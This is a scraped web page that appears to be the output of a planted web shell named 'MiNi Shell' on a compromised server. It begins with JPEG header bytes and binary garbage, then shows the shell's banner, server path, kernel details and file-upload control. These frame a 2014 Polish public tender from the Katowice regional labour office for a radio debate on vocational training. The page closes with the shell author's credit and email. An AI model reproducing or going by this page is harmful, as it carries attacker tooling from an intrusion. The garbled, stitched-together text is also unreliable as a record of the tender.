JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140826/182925-N-2014.html

<p class="kh_header"><b>Katowice: PRZYGOTOWANIE, REALIZACJA I EMISJA DEBATY NA TEMAT OFERTY PRIORYTETU INWESTYCYJNEGO 10.3 BIS REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZCTWA ŚLĄSKIEGO NA LATA 2014 - 2020 W ZAKRESIE M.IN. DOSTOSOWANIA SYSTEMÓW KSZTAŁCENIA I SZKOLENIA DO POTRZEB RYNKU PRACY, WZMOCNIENIA SYSTEMÓW KSZTAŁCENIA I SZKOLENIA ZAWODOWEGO, W TYM SYSTEMU DUALNEGO.</b><br>
<b>Numer ogłoszenia: 182925 - 2014; data zamieszczenia: 26.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu wojewódzctwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYGOTOWANIE, REALIZACJA I EMISJA DEBATY NA TEMAT OFERTY PRIORYTETU INWESTYCYJNEGO 10.3 BIS REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZCTWA ŚLĄSKIEGO NA LATA 2014 - 2020 W ZAKRESIE M.IN. DOSTOSOWANIA SYSTEMÓW KSZTAŁCENIA I SZKOLENIA DO POTRZEB RYNKU PRACY, WZMOCNIENIA SYSTEMÓW KSZTAŁCENIA I SZKOLENIA ZAWODOWEGO, W TYM SYSTEMU DUALNEGO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie, realizacja oraz emisja debaty radiowej na temat oferty Priorytetu Inwestycyjnego 10.3 BIS Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 w zakresie m.in. dostosowania systemów kształcenia i szkolenia do potrzeb rynku pracy, wzmocnienia systemów kształcenia i szkolenia zawodowego, w tym systemu dualnego. 
2. Szczegółowy opis przedmiotu zamówienia
a.	Przedmiot zamówienia obejmuje: przygotowanie, realizację oraz emisję debaty radiowej na temat oferty Priorytetu Inwestycyjnego 10.3 BIS Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 w zakresie m.in. dostosowania systemów kształcenia i szkolenia do potrzeb rynku pracy, wzmocnienia systemów kształcenia i szkolenia zawodowego, w tym systemu dualnego. 

b.	Zorganizowanie publicznej dyskusji ma się przyczynić do promocji możliwości wsparcia, jakie przewiduje Regionalny Program Operacyjny Województwa Śląskiego na lata 2014 - 2020 oraz budowy pozytywnego wizerunku kształcenia zawodowego.

c.	Usługa będzie obejmować:
	stworzenie scenariusza  spotkania we współpracy z Zamawiającym,
	przygotowanie debaty w zakresie organizacyjnym, technicznym i logistycznym,
	zaproszenie i zapewnienie uczestników debaty - prowadzącego dziennikarza, przedstawiciela systemu oświaty (eksperta), pracodawców, przedstawicieli Urzędu Marszałkowskiego Województwa Śląskiego oraz Wojewódzkiego Urzędu Pracy w Katowicach oraz ewentualnie innych gości - lista osób do uzgodnienia z Zamawiającym, 
	nagranie debaty radiowej w studio na terenie woj. śląskiego - w formie min. 30 - max 45 minutowego programu, 
	produkcja zapowiedzi (tzw. promosa) debaty na antenie radiowej o długości max 30 sekund,
	nagranie podsumowania debaty w formie min. 10 max. 15 minutowego programu, podczas którego zostaną przedstawione najciekawsze wypowiedzi,
	dopuszcza się urozmaicenie debaty dodatkowymi materiałami, np. sondą uliczną, mini reportażami wykorzystanie dodatkowych elementów będzie zależało od przyjętego scenariusza debaty;
	zapewnienie opieki dziennikarskiej podczas przygotowania i realizacji usługi,
	zapewnienie odpowiedniej oprawy muzycznej wyprodukowanych materiałów,
	1 - krotną emisję debaty w stacji lub stacjach radiowych obejmujących swym zasięgiem łącznie całe woj. śląskie (wówczas debata musi zostać wyemitowana w każdej ze stacji, które łącznie obejmują swym zasięgiem całe woj. śląskie),
	2 - krotną emisję podsumowania debaty na antenie radiowej w stacji lub stacjach radiowych obejmujących swym zasięgiem łącznie całe woj. śląskie (podsumowanie musi zostać 2-krotnie wyemitowane w każdej ze stacji, które łącznie obejmują swym zasięgiem całe woj. śląskie),
	min. 14-krotną emisję promosów zapowiadających debatę w ciągu 7 dni poprzedzających emisję debaty - w przypadku emisji debaty na antenie 1 stacji radiowej, w przypadku emisji debaty w kilku stacjach radiowych łącznie obejmujących swym zasięgiem całe woj. śląskie - min. 14-krotna emisja promosów poprzedzających debatę w każdej ze stacji,
	emisja debaty oraz podsumowań debaty w godzinach od 8.00 do 20.00
z uwzględnieniem specyfiki ramówki danej stacji radiowej (w bloku programów o charakterze społeczno-ekonomicznym zapewniającym największą słuchalność) - do akceptacji Zamawiającego,
	promosy mają znaleźć się na pozycji premium w bloku reklamowym: pierwsza-ostatnia pozycja w min. 50% emisji w najlepszym czasie słuchalności,
	w jednym bloku reklamowym promos może zostać wyemitowany tylko raz; godziny emisji: 6.00 - 20.00,
	co najmniej 1 stacja radiowa, na antenie której emitowana będzie debata, podsumowanie debaty oraz promosy będzie miała słuchalność na poziomie minimum 2,5 % (zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: grudzień 2013 - maj 2014),
	przekazanie nagrań (debaty, podsumowania debaty oraz promosa) w wersji elektronicznej w formacie MP3 lub innym obsługiwanym przez Windows Media Player - ostateczny format do uzgodnienia z Zamawiającym,
	bezterminowa licencja na wykorzystanie wyprodukowanych materiałów na następujących polach eksploatacji (radio, Internet, utrwalenie na nośnikach elektronicznych wykorzystywanych w dystrybucji bezpośredniej m.in. płyty CD-DVD, pamięć USB).

d.	Harmonogram współpracy:
	Zamawiający przekaże Wykonawcy materiały źródłowe na temat oferty Priorytetu Inwestycyjnego 10.3 BIS Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 w zakresie m.in. dostosowania systemów kształcenia i szkolenia do potrzeb rynku pracy, wzmocnienia systemów kształcenia i szkolenia zawodowego, w tym systemu dualnego w terminie 2 dni roboczych od dnia podpisania umowy,
	Wykonawca przekaże do akceptacji Zamawiającego w terminie 2 dni roboczych
od podpisania umowy dane dziennikarza (moderatora debaty) zaangażowanego w realizację usługi wraz z dokumentacją dotyczącą wymaganego doświadczenia (np. CV);
	Wykonawca przekaże do akceptacji Zamawiającego media plan w terminie 3 dni roboczych od podpisania umowy; media plan może ulec zmianie po zaakceptowaniu przez Zamawiającego, w szczególności ze względu na konieczność zapewnienia obecności zaproszonych gości - uczestników debaty;
	Wykonawca przekaże do akceptacji Zamawiającego scenariusz debaty oraz propozycję treści promosa debaty w terminie 4 dni roboczych od podpisania umowy; Zamawiający akceptuje lub zgłasza uwagi do przesłanych treści w terminie 3 dni roboczych od przekazania;
	Wykonawca przekaże do akceptacji Zamawiającego nagrania promosów, debaty oraz podsumowania debaty w terminie 7 dni roboczych od zaakceptowania scenariuszy promosa oraz debaty; Zamawiający akceptuje lub zgłasza uwagi do przesłanych treści  w terminie 5 dni roboczych od przekazania.
	Wykonawca zobowiązuje się do wyemitowania na końcu każdego materiału  informacji 
o współfinansowaniu przez Unię Europejską z Europejskiego Funduszu Społecznego.
	Po zakończeniu realizacji usługi Wykonawca przekaże Zamawiającemu oświadczenie, iż wszystkie nagrane materiały zostały wyemitowane zgodnie z zaakceptowanym media planem.
	W przypadku niewyemitowania danego materiału (promosa, debaty lub podsumowania debaty) w terminie zgodnym z media planem, Wykonawca zobowiązuje się do zapewnienia emisji w innym terminie i czasie antenowym o równej wartości do czasu, w którym miał on być wyemitowany oraz dodatkowo jednej bezpłatnej emisji  podsumowania debaty w terminie przez siebie wybranym. O nowym czasie emisji Wykonawca jest zobowiązany powiadomić Zamawiającego na dzień przed emisją.
e.	Wykonawca na etapie realizacji usługi zapewni:
	dziennikarza (moderatora debaty) posiadającego co najmniej 5-letnie doświadczenie zawodowe w pracy redakcyjnej w radiu zajmujący się tematyką społeczno-ekonomiczną; doświadczenie w prowadzeniu (moderowaniu) co najmniej 1 debaty/dyskusji o tematyce społeczno-ekonomicznej, która została wyemitowana w mediach regionalnych lub krajowych (radiu, telewizji lub Internecie) w ciągu ostatnich 3 lat;
	lektorów - co najmniej 2 różne głosy do realizacji każdego z nagrań. 

f.	Termin realizacji usługi: do 31 października 2014 r .
g.	Kwestie finansowe związane z realizacją usługi:
	w cenie realizacji usługi należy uwzględnić: kreację, produkcję, emisję, bezterminową licencję oraz inne koszty związane z wykonaniem przedmiotu zamówienia,
	warunkiem zapłaty za wykonaną usługę jest dostarczenie Zamawiającemu: 
- papierowej wersji podpisanego przez Wykonawcę oświadczenia,
że wyprodukowane materiały wyemitowano zgodnie z media planem; 
- elektronicznej wersji wyprodukowanych materiałów - w formacie MP3 lub innym uzgodnionym z Zamawiającym obsługiwanym przez Windows Media Player.

h.	Elementy oferty składane do przetargu:
	Propozycja dotycząca doboru stacji radiowych.
	Wycena wartości usługi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie co najmniej 1 usługę o wartości nie mniejszej niż 18 000,00 zł, której przedmiotem zamówienia była realizacja co najmniej 1 audycji radiowej o charakterze debaty/dyskusji o tematyce społeczno-ekonomicznej, obejmującej kreację, produkcję oraz emisję.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia-nie spełnia na podstawie załączonego do oferty wykazu zawierającego usługi wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą ww przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest świadczona, datą jej realizacji, przedmiotem, wartości oraz załączeniem dowodów, czy usługi wymienione w wykazie zostały wykonane lub są wykonywane należycie. 

Dowody potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Niewykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305- Zespół ds. Zamówień Publicznych, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2014 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pomoc Techniczna PO KL na rok 2014.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com